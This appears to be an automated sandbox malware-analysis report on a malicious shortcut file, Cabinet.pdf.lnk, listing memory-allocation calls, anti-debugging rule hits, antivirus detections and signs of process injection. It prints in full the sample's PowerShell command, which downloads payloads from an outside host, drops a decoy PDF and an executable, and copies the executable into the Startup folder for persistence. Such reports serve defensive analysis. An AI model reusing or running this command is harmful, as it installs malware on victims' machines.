NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 24, 2023, 6 p.m.	process_identifier: 2672 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\Cabinet.pdf.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';wget "https://kdrm201.b-cdn.net/xnt" -OutFile C:\Users\Public\Cab.pdf;Start-Process C:\Users\Public\Cab.pdf;$ProgressPreference = 'SilentlyContinue';wget "https://kdrm201.b-cdn.net/r" -OutFile "C:\ProgramData\p";move "C:\ProgramData\p" "C:\ProgramData\Winver.exe";wget "https://kdrm201.b-cdn.net/xnt" -OutFile C:\Users\Public\Cabinet.pdf;$pqr = Get-ChildItem -Path Env:APPDATA;$xyz = '\Microsoft\Windows\\"Start Menu"\Programs\Startup';$abc = $pqr.value+$xyz;Copy-Item C:\ProgramData\Winver.exe -Destination $abc;Start-Process C:\ProgramData\Winver.exe;cp -Path 'C:\Users\Public\Cabinet.pdf' -destination $pwd.Path;rm *f.l?k;

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 24, 2023, 6 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\Cabinet.pdf.lnk

File has been identified by 13 AntiVirus engines on VirusTotal as malicious (13 events)

Sangfor	Trojan.Generic-LNK.Save.4bea9470
TrendMicro-HouseCall	LNK_ARGULONG.SMLNK
Kaspersky	HEUR:Trojan.WinLNK.Agent.gen
F-Secure	Trojan-Dropper:W32/LnkDropper.G
TrendMicro	LNK_ARGULONG.SMLNK
McAfee-GW-Edition	BehavesLike.Trojan.zx
Sophos	Troj/DownLnk-AY
ZoneAlarm	HEUR:Trojan.WinLNK.Agent.gen
Microsoft	Trojan:Script/Wacatac.B!ml
Google	Detected
VBA32	Trojan.Link.ShellCmd
Zoner	Probably Heur.LNKScript
SentinelOne	Static AI - Suspicious LNK

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	C:\ProgramData\Winver.exe
parent_process	powershell.exe				martian_process	C:\Users\Public\Cab.pdf

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2560 resumed a thread in remote process 2672
NtResumeThread Aug. 24, 2023, 6 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2672	1	0	0

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Cabinet.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All